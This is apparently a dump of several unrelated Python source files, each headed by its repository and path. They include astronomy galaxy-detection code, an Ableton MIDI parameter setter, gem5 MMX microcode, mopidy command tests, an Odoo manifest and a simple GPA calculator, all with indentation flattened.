if not self.frame.contains(position): source = None
else:
# Calculate the pixel position of the galaxy in the frame
pixel_position = position.to_pixel(self.frame.wcs)
# Create a source
source = self.catalog.create_source(index)
# Enable track record if requested
#if self.config.track_record: galaxy.enable_track_record()
# Set attributes based on masks (special and ignore)
if self.special_mask is not None: source.special = self.special_mask.masks(pixel_position)
if self.ignore_mask is not None: source.ignore = self.ignore_mask.masks(pixel_position)
# If the input mask masks this galaxy's position, set to None
if self.bad_mask is not None and self.bad_mask.masks(pixel_position) and not source.principal: source = None
# Add the new source to the list
self.sources.append(source)
# Debug messages
if self.principal is not None:
log.debug(self.principal.name + " is the principal galaxy in the frame")
log.debug("The following galaxies are its companions: " + str(self.principal.companions))
else: log.warning("No principal galaxy found in the frame")
# -----------------------------------------------------------------
def detect_sources(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Detecting the sources in the frame ...")
# Loop over all sources
for source in self.sources:
# Skip None
if source is None: continue
# If this source should be ignored, skip it
if source.ignore: continue
# If the galaxy is the principal galaxy and a region file is given
if source.principal and self.config.principal_region is not None:
# Load the principal galaxy region file
region = SkyRegionList.from_file(self.config.principal_region)
shape = region[0].to_pixel(self.frame.wcs)
# Create a detection for the galaxy from the shape in the region file
outer_factor = self.config.detection.background_outer_factor
source.detection_from_shape(self.frame, shape, outer_factor)
else:
# If requested, use the galaxy extents obtained from the catalog to create the source
if self.config.detection.use_d25 and source.has_extent:
outer_factor = self.config.detection.background_outer_factor
expansion_factor = self.config.detection.d25_expansion_factor
source.detection_from_parameters(self.frame, outer_factor, expansion_factor)
else:
# Detect the source
try: source.detect(self.frame, self.config.detection)
except Exception as e:
#import traceback
log.error("Error during detection")
print(type(e))
print(e)
traceback.print_exc()
#if self.config.plot_track_record_if_exception:
# if source.has_track_record: source.track_record.plot()
# else: log.warning("Track record is not enabled")
# If a source was not found for the principal or companion galaxies, force it
outer_factor = self.config.detection.background_outer_factor
if source.principal and not source.has_detection: source.detection_from_parameters(self.frame, outer_factor)
elif source.companion and not source.has_detection and source.has_extent: source.detection_from_parameters(self.frame, outer_factor)
# Inform the user
log.info("Found a detection for {0} out of {1} objects ({2:.2f}%)".format(self.have_detection, len(self.sources), self.have_source/len(self.sources)*100.0))
# -----------------------------------------------------------------
def set_detections(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Setting the detections ...")
# Loop over all sources
for source in self.sources:
# Skip None
if source is None: continue
# If this source should be ignored, skip it
if source.ignore: continue
# If the galaxy is the principal galaxy and a region file is given
if source.principal and self.config.principal_region is not None:
# Load the principal galaxy region file
region = SkyRegionList.from_file(self.config.principal_region)
shape = region[0].to_pixel(self.frame.wcs)
# Create a detection for the galaxy from the shape in the region file
outer_factor = self.config.detection.background_outer_factor
source.detection_from_shape(self.frame, shape, outer_factor)
else:
# If requested, use the galaxy extents obtained from the catalog to create the source
if source.has_extent:
outer_factor = self.config.detection.background_outer_factor
expansion_factor = self.config.detection.d25_expansion_factor
source.detection_from_parameters(self.frame, outer_factor, expansion_factor)
# The galaxy has no extent, use a standard radius of 20 pixels
else:
default_radius = self.config.region.default_radius
outer_factor = self.config.detection.background_outer_factor
shape = source.ellipse(self.frame.wcs, default_radius)
source.detection_from_shape(self.frame, shape, outer_factor)
# -----------------------------------------------------------------
def find_contours(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Constructing elliptical contours to encompass the detected galaxies ...")
# Loop over all galaxies
for source in self.sources:
# Skip None
if source is None: continue
# If this galaxy should be ignored, skip it
if source.ignore: continue
# If the galaxy does not have a source, continue
if source.has_source: source.find_contour(self.frame, self.config.apertures)
# -----------------------------------------------------------------
@property
def principal_shape(self):
"""
This function ...
:return:
"""
return self.principal.shape
# -----------------------------------------------------------------
@property
def principal_ellipse(self):
"""
This function ...
:return:
"""
# Get the center in pixel coordinates
center = self.principal.pixel_position(self.frame.wcs)
# Get the angle
angle = self.principal.pa_for_wcs(self.frame.wcs)
x_radius = 0.5 * self.principal.major.to("arcsec").value / self.frame.average_pixelscale.to("arcsec").value
y_radius = 0.5 * self.principal.minor.to("arcsec").value / self.frame.average_pixelscale.to("arcsec").value
radius = PixelStretch(x_radius, y_radius)
# Create and return an ellipse
return PixelEllipseRegion(center, radius, angle)
# -----------------------------------------------------------------
@property
def principal_sky_ellipse(self):
"""
This function ...
:return:
"""
# Get the ellipse in image coordinates
ellipse = self.principal_ellipse
# Create a SkyEllipse
sky_ellipse = SkyEllipseRegion.from_pixel(ellipse, self.frame.wcs)
# Return the sky ellipse
return sky_ellipse
# -----------------------------------------------------------------
@property
def principal_mask(self):
"""
This function ...
:return:
"""
if self.principal is None: return Mask.empty_like(self.frame)
#return self.galaxies.get_principal_mask(self.frame)
# Create a new mask with the dimensions of the frame
mask = Mask.empty_like(self.frame)
# Add the principal galaxy's mask to the total mask
mask[self.principal.detection.cutout.y_slice, self.principal.detection.cutout.x_slice] = self.principal.detection.mask
# Return the mask
return mask
# -----------------------------------------------------------------
@property
def companion_mask(self):
"""
This function ...
:return:
"""
#return self.galaxies.get_companion_mask(self.frame)
# Create a new mask with the dimension of the frame
mask = Mask.empty_like(self.frame)
# Loop over all companion galaxies
for source in self.companions:
try:
# Check if the galaxy has a source and add its mask to the total mask
if source.has_detection: mask[source.detection.cutout.y_slice, source.detection.cutout.x_slice] = source.detection.mask
except IndexError: pass
# Return the mask
return mask
# -----------------------------------------------------------------
def create_regions(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Creating regions ...")
# Initialize the region
self.regions = PixelRegionList()
# Loop over all sources
for source in self.sources:
if source is None: continue
# Get the center in pixel coordinates
center = source.pixel_position(self.frame.wcs)
# Set the angle
angle = source.pa_for_wcs(self.frame.wcs).to("deg") if source.pa is not None else Angle(0.0, "deg")
if source.major is None:
color = "red"
x_radius = self.config.region.default_radius
y_radius = self.config.region.default_radius
elif source.minor is None or source.pa is None:
color = "green"
x_radius = 0.5 * source.major.to("arcsec").value / self.frame.average_pixelscale.to("arcsec").value
y_radius = x_radius
else:
color = "green"
x_radius = 0.5 * source.major.to("arcsec").value / self.frame.average_pixelscale.to("arcsec").value
y_radius = 0.5 * source.minor.to("arcsec").value / self.frame.average_pixelscale.to("arcsec").value
radius = PixelStretch(x_radius, y_radius)
# Create a coordinate for the center and add it to the region
meta = {"point": "x"}
self.regions.append(PixelPointRegion(center.x, center.y, meta=meta))
text = source.name
if source.principal: text += " (principal)"
# If hand-drawn principal region
if source.principal and self.config.principal_region is not None: shape = source.shape
# Create an ellipse for the galaxy
else: shape = PixelEllipseRegion(center, radius, angle, meta=meta)
# Set meta information
meta = {"text": text, "color": color, "index": source.index}
shape.meta = meta
# Add the shape to the region list
self.regions.append(shape)
# -----------------------------------------------------------------
def create_segments(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Creating the segmentation map ...")
# Loop over all source
for source in self.sources:
# No source: continue
if source is None: continue
# Skip galaxies without source
if not source.has_detection: continue
# Determine the label for the galaxy
if source.principal: label = 1
elif source.companion: label = 2
else: label = 3
# Add the galaxy mask to the segmentation map
self.segments[source.detection.y_slice, source.detection.x_slice][source.detection.mask] = label
# -----------------------------------------------------------------
def create_table(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Creating the table of extended sources ...")
# Loop over the sources
for source in self.sources:
# No source?
#if source is None: continue
# Add source
self.table.add_source(source)
# -----------------------------------------------------------------
def write(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Writing ...")
# Write table
self.write_table()
# Write regions
self.write_regions()
# Write the segmentation maps
self.write_segments()
# -----------------------------------------------------------------
def write_table(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Writing the table ...")
# Determine the path
path = self.output_path_file("extended_sources.dat")
# Write
self.table.saveto(path)
# -----------------------------------------------------------------
def write_regions(self):
"""
This function ...
:return:
"""
pass
# -----------------------------------------------------------------
def write_segments(self):
"""
This function ...
:return:
"""
pass
# -----------------------------------------------------------------
def write_cutouts(self):
"""
This function ...
:return:
"""
# Determine the full path to the cutouts directory
#directory_path = self.full_output_path(self.config.writing.cutouts_path)
directory_path = fs.join(self.config.output_path, self.config.writing.cutouts_path)
# Inform the user
log.info("Writing cutout boxes to " + directory_path + " ...")
# Keep track of the number of stars encountered
principals = 0
companions = 0
with_source = 0
# Loop over all sources
for source in self.sources:
if source is None: continue
# Check if this is the principal galaxy source
if source.principal:
# Save the cutout as a FITS file
path = fs.join(directory_path, "galaxy_principal_" + str(principals) + ".fits")
source.detection.saveto(path, origin=self.name)
# Increment the counter of the number of principal galaxies (there should only be one, really...)
principals += 1
# Check if this is a companion galaxy
elif source.companion:
# Save the cutout as a FITS file
path = fs.join(directory_path, "galaxy_companion_" + str(companions) + ".fits")
source.detection.saveto(path, origin=self.name)
# Increment the counter of the number of companion galaxies
companions += 1
# Check if this galaxy has a source
elif source.has_detection:
# Save the cutout as a FITS file
path = fs.join(directory_path, "galaxy_source_" + str(principals) + ".fits")
source.detection.saveto(path, origin=self.name)
# Increment the counter of the number of galaxies with a source
with_source += 1
# -----------------------------------------------------------------
@property
def have_source(self):
"""
This function ...
:return:
"""
count = 0
for source in self.sources:
if source is None: continue
count += 1
return count
# -----------------------------------------------------------------
@property
def have_detection(self):
"""
This function ...
:return:
"""
count = 0
for source in self.sources:
if source is None: continue
if source.ignore: continue
count += source.has_detection
return count
# -----------------------------------------------------------------
|
lushfuture/Liveduino
|
refs/heads/master
|
libraries/stc-1.2.9/Selected_Track_Control/ParamSetter.py
|
1
|
import Live
import MIDI
import settings
from Logging import log
# general device parameter setter
def general_device(song, device, param, value, mode, status):
param_range = param.max - param.min
#log("set %s (%s): %s - %s" % (param.name, param.value, param.min, param.max))
if param.is_quantized:
if status == MIDI.CC_STATUS and mode == MIDI.ABSOLUTE:
# absolute CC
param.value = round(param_range*value/127.0 + param.min)
else:
# relative CC or NOTE
if param_range == 1 or status == MIDI.NOTEON_STATUS:
# circle through quantized values
p_value = param.value + value
if p_value > param.max:
# values can be bigger than one => take overlap and add it min
p_value = param.min + (p_value % (param_range + 1))
elif p_value < param.min:
p_value = param.max - ((p_value - 1) % (param_range + 1))
param.value = p_value
else:
# range is bigger than on/off and we have relative CC
# => do NOT circle through quantized values
param.value = max(param.min, min(param.max, param.value + value))
else:
if mode == MIDI.ABSOLUTE:
param.value = param_range*value/127.0 + param.min
else:
#param.value = max(param.min, min(param.max, param.value + (value/100.0)))
if param_range > 4:
param.value = max(param.min, min(param.max, param.value + value))
else:
param.value = max(param.min, min(param.max, param.value + param_range*value/127.0))
def looper(song, device, param, value, mode, status):
if not param.name == "State":
general_device(song, device, param, value, mode, status)
return
# get current state:
# 1 - record; 0 - stop; 2 - play; 3 - overdub;
if not value:
return
# floor value to a stepping value
if param.value == 3:
# if "overdub" is active, step back to "play"
value = -1
else:
value = 1
if param.value == 0:
# enable play for record to work
song.continue_playing()
param.value = param.value + value
#general_device(song, device, param, value, mode, status)
setters = {
"Looper": looper
}
def get(device):
if device.name in setters:
return setters[device.name]
return general_device
|
dparks1134/STAMP
|
refs/heads/master
|
stamp/GUI/plotDlg.py
|
1
|
#=======================================================================
# Author: Donovan Parks
#
# Dock widget containing customizable group legend.
#
# Copyright 2011 Donovan Parks
#
# This file is part of STAMP.
#
# STAMP is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# STAMP is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with STAMP. If not, see <http://www.gnu.org/licenses/>.
#=======================================================================
from PyQt4 import QtGui, QtCore
from plotDlgUI import Ui_PlotDlg
class PlotDlg(QtGui.QDockWidget):
def __init__(self, parent=None, info=None):
QtGui.QWidget.__init__(self, parent)
self.ui = Ui_PlotDlg()
self.ui.setupUi(self)
QtCore.QObject.connect(self, QtCore.SIGNAL("topLevelChanged (bool)"), self.topLevelChanged )
QtCore.QObject.connect(self, QtCore.SIGNAL("dockLocationChanged(Qt::DockWidgetArea)"), self.dockLocationChanged)
self.plot = None
def addPlot(self, plot):
self.ui.scrollArea.setWidget(plot)
self.plot = plot
def topLevelChanged (self, bFloating):
if self.plot == None:
return
if bFloating:
w, h = self.plot.get_width_height()
self.setMaximumSize(w, h)
if h > 800:
h = 800
self.resize(w, h)
def dockLocationChanged(self):
self.setMaximumSize(10000, 10000)
if __name__ == "__main__":
pass
|
lmorchard/badg.us
|
refs/heads/master
|
settings_test.py
|
65
|
# These settings will always be overriding for all test runs
# this bypasses bcrypt to speed up test fixtures
PASSWORD_HASHERS = (
'django.contrib.auth.hashers.MD5PasswordHasher',
)
|
yb-kim/gemV
|
refs/heads/gemV
|
src/arch/x86/isa/insts/simd64/integer/arithmetic/addition.py
|
91
|
# Copyright (c) 2007 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
microcode = '''
def macroop PADDB_MMX_MMX {
maddi mmx, mmx, mmxm, size=1, ext=0
};
def macroop PADDB_MMX_M {
ldfp ufp1, seg, sib, disp, dataSize=8
maddi mmx, mmx, ufp1, size=1, ext=0
};
def macroop PADDB_MMX_P {
rdip t7
ldfp ufp1, seg, riprel, disp, dataSize=8
maddi mmx, mmx, ufp1, size=1, ext=0
};
def macroop PADDW_MMX_MMX {
maddi mmx, mmx, mmxm, size=2, ext=0
};
def macroop PADDW_MMX_M {
ldfp ufp1, seg, sib, disp, dataSize=8
maddi mmx, mmx, ufp1, size=2, ext=0
};
def macroop PADDW_MMX_P {
rdip t7
ldfp ufp1, seg, riprel, disp, dataSize=8
maddi mmx, mmx, ufp1, size=2, ext=0
};
def macroop PADDD_MMX_MMX {
maddi mmx, mmx, mmxm, size=4, ext=0
};
def macroop PADDD_MMX_M {
ldfp ufp1, seg, sib, disp, dataSize=8
maddi mmx, mmx, ufp1, size=4, ext=0
};
def macroop PADDD_MMX_P {
rdip t7
ldfp ufp1, seg, riprel, disp, dataSize=8
maddi mmx, mmx, ufp1, size=4, ext=0
};
def macroop PADDQ_MMX_MMX {
maddi mmx, mmx, mmxm, size=8, ext=0
};
def macroop PADDQ_MMX_M {
ldfp ufp1, seg, sib, disp, dataSize=8
maddi mmx, mmx, ufp1, size=8, ext=0
};
def macroop PADDQ_MMX_P {
rdip t7
ldfp ufp1, seg, riprel, disp, dataSize=8
maddi mmx, mmx, ufp1, size=8, ext=0
};
def macroop PADDSB_MMX_MMX {
maddi mmx, mmx, mmxm, size=1, ext = "2 |" + Signed
};
def macroop PADDSB_MMX_M {
ldfp ufp1, seg, sib, disp, dataSize=8
maddi mmx, mmx, ufp1, size=1, ext = "2 |" + Signed
};
def macroop PADDSB_MMX_P {
rdip t7
ldfp ufp1, seg, riprel, disp, dataSize=8
maddi mmx, mmx, ufp1, size=1, ext = "2 |" + Signed
};
def macroop PADDSW_MMX_MMX {
maddi mmx, mmx, mmxm, size=2, ext = "2 |" + Signed
};
def macroop PADDSW_MMX_M {
ldfp ufp1, seg, sib, disp, dataSize=8
maddi mmx, mmx, ufp1, size=2, ext = "2 |" + Signed
};
def macroop PADDSW_MMX_P {
rdip t7
ldfp ufp1, seg, riprel, disp, dataSize=8
maddi mmx, mmx, ufp1, size=2, ext = "2 |" + Signed
};
def macroop PADDUSB_MMX_MMX {
maddi mmx, mmx, mmxm, size=1, ext=2
};
def macroop PADDUSB_MMX_M {
ldfp ufp1, seg, sib, disp, dataSize=8
maddi mmx, mmx, ufp1, size=1, ext=2
};
def macroop PADDUSB_MMX_P {
rdip t7
ldfp ufp1, seg, riprel, disp, dataSize=8
maddi mmx, mmx, ufp1, size=1, ext=2
};
def macroop PADDUSW_MMX_MMX {
maddi mmx, mmx, mmxm, size=2, ext=2
};
def macroop PADDUSW_MMX_M {
ldfp ufp1, seg, sib, disp, dataSize=8
maddi mmx, mmx, ufp1, size=2, ext=2
};
def macroop PADDUSW_MMX_P {
rdip t7
ldfp ufp1, seg, riprel, disp, dataSize=8
maddi mmx, mmx, ufp1, size=2, ext=2
};
'''
|
jmarsik/mopidy
|
refs/heads/develop
|
tests/mpd/test_commands.py
|
17
|
# encoding: utf-8
from __future__ import absolute_import, unicode_literals
import unittest
from mopidy.mpd import exceptions, protocol
class TestConverts(unittest.TestCase):
def test_integer(self):
self.assertEqual(123, protocol.INT('123'))
self.assertEqual(-123, protocol.INT('-123'))
self.assertEqual(123, protocol.INT('+123'))
self.assertRaises(ValueError, protocol.INT, '3.14')
self.assertRaises(ValueError, protocol.INT, '')
self.assertRaises(ValueError, protocol.INT, 'abc')
self.assertRaises(ValueError, protocol.INT, '12 34')
def test_unsigned_integer(self):
self.assertEqual(123, protocol.UINT('123'))
self.assertRaises(ValueError, protocol.UINT, '-123')
self.assertRaises(ValueError, protocol.UINT, '+123')
self.assertRaises(ValueError, protocol.UINT, '3.14')
self.assertRaises(ValueError, protocol.UINT, '')
self.assertRaises(ValueError, protocol.UINT, 'abc')
self.assertRaises(ValueError, protocol.UINT, '12 34')
def test_boolean(self):
self.assertEqual(True, protocol.BOOL('1'))
self.assertEqual(False, protocol.BOOL('0'))
self.assertRaises(ValueError, protocol.BOOL, '3.14')
self.assertRaises(ValueError, protocol.BOOL, '')
self.assertRaises(ValueError, protocol.BOOL, 'true')
self.assertRaises(ValueError, protocol.BOOL, 'false')
self.assertRaises(ValueError, protocol.BOOL, 'abc')
self.assertRaises(ValueError, protocol.BOOL, '12 34')
def test_range(self):
self.assertEqual(slice(1, 2), protocol.RANGE('1'))
self.assertEqual(slice(0, 1), protocol.RANGE('0'))
self.assertEqual(slice(0, None), protocol.RANGE('0:'))
self.assertEqual(slice(1, 3), protocol.RANGE('1:3'))
self.assertRaises(ValueError, protocol.RANGE, '3.14')
self.assertRaises(ValueError, protocol.RANGE, '1:abc')
self.assertRaises(ValueError, protocol.RANGE, 'abc:1')
self.assertRaises(ValueError, protocol.RANGE, '2:1')
self.assertRaises(ValueError, protocol.RANGE, '-1:2')
self.assertRaises(ValueError, protocol.RANGE, '1 : 2')
self.assertRaises(ValueError, protocol.RANGE, '')
self.assertRaises(ValueError, protocol.RANGE, 'true')
self.assertRaises(ValueError, protocol.RANGE, 'false')
self.assertRaises(ValueError, protocol.RANGE, 'abc')
self.assertRaises(ValueError, protocol.RANGE, '12 34')
class TestCommands(unittest.TestCase):
def setUp(self): # noqa: N802
self.commands = protocol.Commands()
def test_add_as_a_decorator(self):
@self.commands.add('test')
def test(context):
pass
def test_register_second_command_to_same_name_fails(self):
def func(context):
pass
self.commands.add('foo')(func)
with self.assertRaises(Exception):
self.commands.add('foo')(func)
def test_function_only_takes_context_succeeds(self):
sentinel = object()
self.commands.add('bar')(lambda context: sentinel)
self.assertEqual(sentinel, self.commands.call(['bar']))
def test_function_has_required_arg_succeeds(self):
sentinel = object()
self.commands.add('bar')(lambda context, required: sentinel)
self.assertEqual(sentinel, self.commands.call(['bar', 'arg']))
def test_function_has_optional_args_succeeds(self):
sentinel = object()
self.commands.add('bar')(lambda context, optional=None: sentinel)
self.assertEqual(sentinel, self.commands.call(['bar']))
self.assertEqual(sentinel, self.commands.call(['bar', 'arg']))
def test_function_has_required_and_optional_args_succeeds(self):
sentinel = object()
def func(context, required, optional=None):
return sentinel
self.commands.add('bar')(func)
self.assertEqual(sentinel, self.commands.call(['bar', 'arg']))
self.assertEqual(sentinel, self.commands.call(['bar', 'arg', 'arg']))
def test_function_has_varargs_succeeds(self):
sentinel, args = object(), []
self.commands.add('bar')(lambda context, *args: sentinel)
for i in range(10):
self.assertEqual(sentinel, self.commands.call(['bar'] + args))
args.append('test')
def test_function_has_only_varags_succeeds(self):
sentinel = object()
self.commands.add('baz')(lambda *args: sentinel)
self.assertEqual(sentinel, self.commands.call(['baz']))
def test_function_has_no_arguments_fails(self):
with self.assertRaises(TypeError):
self.commands.add('test')(lambda: True)
def test_function_has_required_and_varargs_fails(self):
with self.assertRaises(TypeError):
def func(context, required, *args):
pass
self.commands.add('test')(func)
def test_function_has_optional_and_varargs_fails(self):
with self.assertRaises(TypeError):
def func(context, optional=None, *args):
pass
self.commands.add('test')(func)
def test_function_hash_keywordargs_fails(self):
with self.assertRaises(TypeError):
self.commands.add('test')(lambda context, **kwargs: True)
def test_call_chooses_correct_handler(self):
sentinel1, sentinel2, sentinel3 = object(), object(), object()
self.commands.add('foo')(lambda context: sentinel1)
self.commands.add('bar')(lambda context: sentinel2)
self.commands.add('baz')(lambda context: sentinel3)
self.assertEqual(sentinel1, self.commands.call(['foo']))
self.assertEqual(sentinel2, self.commands.call(['bar']))
self.assertEqual(sentinel3, self.commands.call(['baz']))
def test_call_with_nonexistent_handler(self):
with self.assertRaises(exceptions.MpdUnknownCommand):
self.commands.call(['bar'])
def test_call_passes_context(self):
sentinel = object()
self.commands.add('foo')(lambda context: context)
self.assertEqual(
sentinel, self.commands.call(['foo'], context=sentinel))
def test_call_without_args_fails(self):
with self.assertRaises(exceptions.MpdNoCommand):
self.commands.call([])
def test_call_passes_required_argument(self):
self.commands.add('foo')(lambda context, required: required)
self.assertEqual('test123', self.commands.call(['foo', 'test123']))
def test_call_passes_optional_argument(self):
sentinel = object()
self.commands.add('foo')(lambda context, optional=sentinel: optional)
self.assertEqual(sentinel, self.commands.call(['foo']))
self.assertEqual('test', self.commands.call(['foo', 'test']))
def test_call_passes_required_and_optional_argument(self):
def func(context, required, optional=None):
return (required, optional)
self.commands.add('foo')(func)
self.assertEqual(('arg', None), self.commands.call(['foo', 'arg']))
self.assertEqual(
('arg', 'kwarg'), self.commands.call(['foo', 'arg', 'kwarg']))
def test_call_passes_varargs(self):
self.commands.add('foo')(lambda context, *args: args)
def test_call_incorrect_args(self):
self.commands.add('foo')(lambda context: context)
with self.assertRaises(exceptions.MpdArgError):
self.commands.call(['foo', 'bar'])
self.commands.add('bar')(lambda context, required: context)
with self.assertRaises(exceptions.MpdArgError):
self.commands.call(['bar', 'bar', 'baz'])
self.commands.add('baz')(lambda context, optional=None: context)
with self.assertRaises(exceptions.MpdArgError):
self.commands.call(['baz', 'bar', 'baz'])
def test_validator_gets_applied_to_required_arg(self):
sentinel = object()
def func(context, required):
return required
self.commands.add('test', required=lambda v: sentinel)(func)
self.assertEqual(sentinel, self.commands.call(['test', 'foo']))
def test_validator_gets_applied_to_optional_arg(self):
sentinel = object()
def func(context, optional=None):
return optional
self.commands.add('foo', optional=lambda v: sentinel)(func)
self.assertEqual(sentinel, self.commands.call(['foo', '123']))
def test_validator_skips_optional_default(self):
sentinel = object()
def func(context, optional=sentinel):
return optional
self.commands.add('foo', optional=lambda v: None)(func)
self.assertEqual(sentinel, self.commands.call(['foo']))
def test_validator_applied_to_non_existent_arg_fails(self):
self.commands.add('foo')(lambda context, arg: arg)
with self.assertRaises(TypeError):
def func(context, wrong_arg):
return wrong_arg
self.commands.add('bar', arg=lambda v: v)(func)
def test_validator_called_context_fails(self):
return # TODO: how to handle this
with self.assertRaises(TypeError):
def func(context):
pass
self.commands.add('bar', context=lambda v: v)(func)
def test_validator_value_error_is_converted(self):
def validdate(value):
raise ValueError
def func(context, arg):
pass
self.commands.add('bar', arg=validdate)(func)
with self.assertRaises(exceptions.MpdArgError):
self.commands.call(['bar', 'test'])
def test_auth_required_gets_stored(self):
def func1(context):
pass
def func2(context):
pass
self.commands.add('foo')(func1)
self.commands.add('bar', auth_required=False)(func2)
self.assertTrue(self.commands.handlers['foo'].auth_required)
self.assertFalse(self.commands.handlers['bar'].auth_required)
def test_list_command_gets_stored(self):
def func1(context):
pass
def func2(context):
pass
self.commands.add('foo')(func1)
self.commands.add('bar', list_command=False)(func2)
self.assertTrue(self.commands.handlers['foo'].list_command)
self.assertFalse(self.commands.handlers['bar'].list_command)
|
optima-ict/odoo
|
refs/heads/9.0
|
addons/l10n_vn/__openerp__.py
|
17
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
# This module is Copyright (c) 2009-2013 General Solutions (http://gscom.vn) All Rights Reserved.
{
"name" : "Vietnam - Accounting",
"version" : "1.0",
"author" : "General Solutions",
'website': 'http://gscom.vn',
"category" : "Localization/Account Charts",
"description": """
This is the module to manage the accounting chart for Vietnam in OpenERP.
=========================================================================
This module applies to companies based in Vietnamese Accounting Standard (VAS).
**Credits:** General Solutions.
""",
"depends" : ["account","base_vat","base_iban"],
"data" : ["account_chart.xml","account_tax.xml","account_chart_template.yml"],
"demo" : [],
"installable": True,
}
|
kerr-huang/Testerman
|
refs/heads/master
|
core/snmp/pysnmp/proto/secmod/rfc3414/auth/noauth.py
|
2
|
from pysnmp.proto.secmod.rfc3414.auth import base
class NoAuth(base.AbstractAuthenticationService):
serviceID = (1, 3, 6, 1, 6, 3, 10, 1, 1, 1) # usmNoAuthProtocol
|
peterakdemir/python_sandbox
|
refs/heads/master
|
GPA_Calculator.py
|
1
|
#The GPA calculator
print("GPA Calculator\n\n")
#for this code we are going to make it easy for someone to calculate their GPA and average for their marking period. we assumed that the
#for all the variables that start with g we are asking for average grade in that class for that marking period
g1 = float(input("Grade for Course 1:"))
#for all the variables that start with c we are asking for the number of in that class for that marking period
c1 = float(input("Amount of Credits the Course Takes:"))
g2 = float(input("\nGrade for Course 2:"))
c2 = float(input("Amount of Credits the Course Takes:"))
g3 = float(input("\nGrade for Course 3:"))
c3 = float(input("Amount of Credits the Course Takes:"))
g4 = float(input("\nGrade for Course 4:"))
c4 = float(input("Amount of Credits the Course Takes:"))
g5 = float(input("\nGrade for Course 5:"))
c5 = float(input("Amount of Credits the Course Takes:"))
g6 = float(input("\nGrade for Course 6:"))
c6 = float(input("Amount of Credits the Course Takes:"))
g7 = float(input("\nGrade for Course 7:"))
c7 = float(input("Amount of Credits the Course Takes:"))
g8 = input("\nGrade for Course 8 (if you don't have a course 8, put a dash):")
c8 = input("Amount of Credits the Course Takes (if you don't have a course 8, put a dash):")
print()
#I am now calculating the users average grade for the marking period.
#This is if the user is a freshman and takes a double period course
if g8 == "-":
a1 = g1*c1
a2 = g2*c2
a3 = g3*c3
a4 = g4*c4
a5 = g5*c5
a6 = g6*c6
a7 = g7*c7
average = (a1+a2+a3+a4+a5+a6+a7)/(c1+c2+c3+c4+c5+c6+c7)
#i made another variable dividing the average grade by 25 to put it into the 4.0 GPA grading system
gpa = average/25
#this is my final out put where alll my work comes together.
print("Your AVERAGE grade this semester/marking period so far is a ", format(average, ".2f"), ". \n\nYour GPA for this semester/marking peroid so far is a ", format(gpa, ".2f"), ".", sep="")
#this is if the user takes 8 1 period courses
elif g8 != "-" and c8 != "-":
g8 = int(g8)
c8 = int(c8)
a1 = g1*c1
a2 = g2*c2
a3 = g3*c3
a4 = g4*c4
a5 = g5*c5
a6 = g6*c6
a7 = g7*c7
a8 = g8*c8
average = (a1+a2+a3+a4+a5+a6+a7+a8)/(c1+c2+c3+c4+c5+c6+c7+c8)
#i made another variable dividing the average grade by 25 to put it into the 4.0 GPA grading system
gpa = average/25
#this is my final out put where alll my work comes together.
print("Your AVERAGE grade this semester/marking period so far is a ", format(average, ".2f"), ". \n\nYour GPA for this semester/marking peroid so far is a ", format(gpa, ".2f"), ".", sep="")
|
tensorflow/probability
|
refs/heads/main
|
tensorflow_probability/python/version.py
|
1
|
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Define TensorFlow Probability version information."""
# We follow Semantic Versioning (https://semver.org/)
_MAJOR_VERSION = '0'
_MINOR_VERSION = '14'
_PATCH_VERSION = '0'
# When building releases, we can update this value on the release branch to
